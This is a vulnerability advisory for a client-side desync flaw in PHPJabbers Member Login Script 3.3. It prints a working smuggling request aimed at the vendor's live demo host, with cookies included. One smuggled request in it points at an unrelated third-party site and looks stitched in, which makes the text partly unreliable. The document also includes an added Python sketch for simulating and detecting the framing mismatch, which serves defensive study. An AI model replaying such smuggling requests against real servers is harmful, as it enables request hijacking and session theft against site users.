## Title: Member Login Script 3.3 - Client-Side Desync
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync
## Description:
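The server appears to be vulnerable to client-side desync attacks. A
POST request was sent to the path '/1692959852_473/index.php' with a
second request sent as the body. The server ignored the Content-Length
header and did not close the connection, so the smuggled request was
interpreted as the next request.
Status: HIGH vulnerability
[+] Exploit: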
````````
POST /1692959852_473/index.php?controller=pjfront&action=pjactionloadcss HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0
Cookie: _ga=ga1.2.2.2069938240.1692907228; _gid=ga1.2.1275975650.1692907228; _gat=1; _fbp=fb.1.1692907228280.366290059; _GA_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0; yellowpages=slk3eokcgmdf0r3t7c020quv35; PJD=G0I8FCH5JKEBRAAAF2812AFVB5; PJD_1692957219_259=1
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 1190
Content-Type: application/x-www-form-urlencoded

GET /robots.txt HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0

GET /robots.txt HTTP/2
Host: www.pornhub.com
Cookie: platform=PC; SS=405039333413129808; FG_0D2EC4CBD943DF07EC161982A603817E=60256.100000; FG_9951CE1AC4434B4AC312A1334FA77D82=6902.100000
Cache-Control: max-age=0
Sec-CH-UA:
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Full-Version: ""
Sec-CH-UA-Arch: ""
Sec-CH-UA-Platform: ""
Sec-CH-UA-Platform-Version: ""
Sec-CH-UA-Model: ""
Sec-CH-UA-Full-Version-List:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
````````
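
The framing mismatch described above, as an added example that is not part of the original advisory: the sketch parses one keep-alive byte stream the way a server that honours Content-Length would, then the way a server that ignores it would, and includes a heuristic check for POST bodies that begin with an HTTP request line. The host `app.example.test`, the paths and all function names are constructed for illustration.

```python
import re

# Heuristic: a request body that itself starts with an HTTP request line.
REQ_LINE = re.compile(rb"^(GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) \S+ HTTP/\d(\.\d)?\r?\n")

def split_head(buf):
    """Split raw bytes into (request line, lower-cased headers, remainder)."""
    head, _, rest = buf.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, rest

def frame(stream, honor_content_length):
    """List the request lines a server would see on one connection."""
    seen = []
    while stream.strip():
        request_line, headers, rest = split_head(stream)
        seen.append(request_line.decode())
        # A server that ignores Content-Length treats the body as the next request.
        n = int(headers.get(b"content-length", b"0")) if honor_content_length else 0
        stream = rest[n:]
    return seen

def body_embeds_request(stream):
    """Detection check: does the declared body open with a request line?"""
    _, headers, rest = split_head(stream)
    n = int(headers.get(b"content-length", b"0"))
    return bool(REQ_LINE.match(rest[:n]))

# Constructed sample traffic (not taken from the advisory).
INNER = b"GET /robots.txt HTTP/1.1\r\nHost: app.example.test\r\n\r\n"
OUTER = (b"POST /index.php HTTP/1.1\r\nHost: app.example.test\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: " + str(len(INNER)).encode() + b"\r\n\r\n" + INNER)
BENIGN = (b"POST /index.php HTTP/1.1\r\nHost: app.example.test\r\n"
          b"Content-Length: 7\r\n\r\nuser=ab")

if __name__ == "__main__":
    print("honours Content-Length:", frame(OUTER, True))
    print("ignores Content-Length:", frame(OUTER, False))
    print("flagged:", body_embeds_request(OUTER), body_embeds_request(BENIGN))
```

The body check is a heuristic for proxy or WAF logs; the fix belongs on the server, which must either consume the declared body or close the connection.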
## Reproduce:
[HREF](https://github.com/nu11secur1ty/cve...jabbers/2023/members-login-script-script-3.3)
## Proof and Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html)
## Time spent:
00:35:00